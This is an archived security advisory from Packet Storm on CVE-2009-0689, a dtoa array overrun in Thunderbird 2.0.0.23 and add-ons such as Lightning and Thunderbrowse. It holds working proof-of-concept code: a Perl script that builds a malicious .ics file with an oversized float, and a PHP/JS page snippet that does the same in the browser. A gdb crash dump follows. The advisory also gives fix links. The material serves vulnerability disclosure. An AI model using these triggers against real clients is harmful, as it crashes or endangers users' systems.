exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Thunderbird 2.0.0.23 Remote Array Overrun

Thunderbird 2.0.0.23 Remote Array Overrun
Posted Dec 12, 2009
Authored by Maksymilian Arciemowicz | Site securityreason.com

Thunderbird version 2.0.0.23 suffers from a remote array overrun that allows for arbitrary code execution.

tags | exploit, remote, overflow, arbitrary, code execution
advisories | CVE-2009-0689
SHA-256 | 9a6a391941b200a19efd9a43cd84797f49e731b5b7c082401291e365c9294a3d

Thunderbird 2.0.0.23 Remote Array Overrun

Change Mirror Download
[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Thunderbird 2.0.0.23

Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/78


--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it?s easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.


--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for
thunderbird.

Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more

and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.


--- 2. Proof of Concept (PoC) ---

(PoC for Lightning )
-----------------------
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3

my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T020000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T030000\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".
"DTEND;TZID=Europe/Prague:20100111T120000\n".
"END:VEVENT\n".
"END:VCALENDAR\n";

open(myfile,'>>test.ics');
print myfile $header.$s.$expl.$footer;
-----------------------

(PoC for Thunderbrowse )
-----------------------
<script>
var a=0.<?php echo str_repeat("1",333333); ?>;
</script>
-----------------------

When we use Thunderbrowse to see this site, Thunderbird will crash with:

Program terminated with signal 11, Segmentation fault.
#0 0xbb15d1e7 in ?? ()

eax 0x0 0
ecx 0xa 10
edx 0x0 0
ebx 0xbb16eb38 -1156125896
esp 0xbfbfce58 0xbfbfce58
ebp 0xbfbfce74 0xbfbfce74
esi 0xb 11
edi 0xb768e700 -1217861888
eip 0xbb15d1e7 0xbb15d1e7
eflags 0x282 [ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0xab 171
gs 0xb3 179

(gdb) x/x ($eip)
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb: Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700: 0x1c71c71c

now esi=0xb and edi=0x1c71c71c

(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7

(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420
0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a
0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d
0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44
0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9
0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49
0xb7697848: 0xd75822f6 0x83ebbe5a


--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close